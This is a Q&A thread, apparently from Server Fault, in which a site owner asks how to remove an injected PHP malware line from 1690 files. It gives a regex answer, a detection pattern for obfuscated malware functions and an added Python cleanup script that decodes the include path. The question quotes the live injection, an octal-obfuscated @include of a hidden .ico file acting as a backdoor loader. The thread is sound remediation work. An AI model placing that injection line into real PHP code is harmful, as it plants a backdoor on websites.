I am trying to find a way to find and replace using EMEditor and a regular expression. I am trying to apply this to the item below:

<?php
/*f04b8*/

@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";

/*f04b8*/ // ini_set('display_errors', 1);

I am trying to replace / erase the code between

<?php

and

// ini_set('display_errors', 1);

Everything in between is this malware script that I am trying to get out of many files.

I am looking for an easy way to delete this in 1690 files. Any idea would be very helpful.

Best wishes, Thomas

Thom
Does this answer your question? [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) – djdomi Nov 04 '21 at 18:12

1 Answer

The PHP regular expression for any similar strings would be:

/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/

This can be further simplified but works as is.

Note: this will find all occurrences of the offending strings, starting with a comment block containing 5 random characters that are not newlines, followed by two newlines, the @include line, 2 more newlines, and the matching block-comment closure, regardless of whether the document was saved on a Windows, Mac, or Linux machine. Note \r\n (Windows machines) and \n\n (Linux & Mac machines).

I've verified that your string matches the regex at: https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/

Quick heads-up: to find the malware files with random string names that contain the obfuscated functions, use the following regex:

/function...\(\$..\){\$...\=."/

This should track down the altered files and find any additional malware files of the same kind for the malware you're being affected by.

Have a great day! Hopefully this is still useful to someone.

Davidw
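A way to do the same cleanup across all 1690 files with a script instead of an editor pass, added here as an example and not part of the question or the answer. It uses the same shape of pattern as the regex in the answer (opening marker, blank line, the @include line, blank line, closing marker), accepts CRLF or LF, and additionally requires the closing marker to equal the opening one, which is stricter than the answer's pattern; the marker length of 5 non-newline characters is taken from the answer. It also decodes the octal-escaped include path (standard PHP double-quoted string escapes, \ooo and \xhh) so you can see which file the injection pulls in: that file is the actual backdoor, and stripping the include lines alone leaves it in place. The script name, the backup-directory default and the sample bytes are constructed for this example.

```python
"""Strip the '/*tag*/ ... @include "..."; ... /*tag*/' injection from PHP files
and decode the octal-escaped include path so the dropped payload can be found.
Added example, not from the original post. Assumptions: the marker is 5
non-newline characters and the closing marker equals the opening one."""
import argparse
import re
from pathlib import Path

# Opening marker, blank line, the @include line, blank line, identical closing
# marker. \r?\n accepts both CRLF and LF. A bytes regex is used so files in any
# encoding can be processed without decode errors.
INJECTION = re.compile(
    rb'/\*(?P<tag>[^\r\n*]{5})\*/\r?\n\r?\n'
    rb'@include\s+"(?P<path>[^"\r\n]*)";[ \t]*\r?\n\r?\n'
    rb'/\*(?P=tag)\*/[ \t]*'
)

# PHP double-quoted string escapes: \ooo (octal), \xhh (hex) and the one-letter ones.
_PHP_ESCAPE = re.compile(r'\\(?:([0-7]{1,3})|x([0-9A-Fa-f]{1,2})|(.))', re.DOTALL)
_SIMPLE = {'n': '\n', 'r': '\r', 't': '\t', 'v': '\v', 'f': '\f', 'e': '\x1b',
           '\\': '\\', '$': '$', '"': '"'}


def decode_php_escapes(s: str) -> str:
    """Turn an obfuscated "\\057mn\\164..." literal into the real path string."""
    def repl(m):
        octal, hexa, ch = m.groups()
        if octal is not None:
            return chr(int(octal, 8) & 0xFF)
        if hexa is not None:
            return chr(int(hexa, 16))
        return _SIMPLE.get(ch, '\\' + ch)  # unknown escapes stay verbatim, as in PHP
    return _PHP_ESCAPE.sub(repl, s)


def strip_injection(data: bytes):
    """Return (cleaned file contents, list of decoded include targets found)."""
    targets = [decode_php_escapes(m.group('path').decode('latin-1'))
               for m in INJECTION.finditer(data)]
    return INJECTION.sub(b'', data), targets


def clean_tree(root, backup_dir=None, apply=False):
    """Walk root for *.php files; report (and, with apply=True, clean) infected ones.
    Originals are copied to backup_dir (keep it outside the webroot, so they are
    neither served nor lost for the incident record). Returns {file: [targets]}."""
    root = Path(root)
    hits = {}
    for php in sorted(root.rglob('*.php')):
        data = php.read_bytes()
        cleaned, targets = strip_injection(data)
        if not targets:
            continue
        hits[str(php)] = targets
        if apply:
            backup = Path(backup_dir) / php.relative_to(root)
            backup.parent.mkdir(parents=True, exist_ok=True)
            backup.write_bytes(data)
            php.write_bytes(cleaned)
    return hits


# Constructed sample reproducing the snippet from the question (LF line endings).
SAMPLE = (
    b'<?php\n'
    b'/*f04b8*/\n'
    b'\n'
    b'@include "\\057mn\\164/r\\141id\\057ho\\155e/\\164ap\\151om\\171/h\\164do\\143s/'
    b'\\124ap\\151oP\\157rt\\141l/\\154ib\\162ar\\151es\\057.d\\1419e\\06484\\063.i\\143o";\n'
    b'\n'
    b"/*f04b8*/ // ini_set('display_errors', 1);\n"
)

if __name__ == '__main__':
    ap = argparse.ArgumentParser(description='remove the /*tag*/ @include injection')
    ap.add_argument('root', type=Path, help='webroot to scan')
    ap.add_argument('--backup-dir', type=Path, default=Path('/tmp/php-cleanup-backup'))
    ap.add_argument('--apply', action='store_true',
                    help='rewrite files (default: report only)')
    args = ap.parse_args()
    print('sample include decodes to:', strip_injection(SAMPLE)[1])
    for path, includes in clean_tree(args.root, args.backup_dir, args.apply).items():
        print(path, '->', includes)
```

Run it as `python clean_include.py /path/to/htdocs` first to get the list of infected files and the decoded include targets, then again with `--apply` once the list looks right, and delete the payload files it points to as well. This removes one visible symptom only; as the comment under the question notes, it does not tell you how the files were written in the first place.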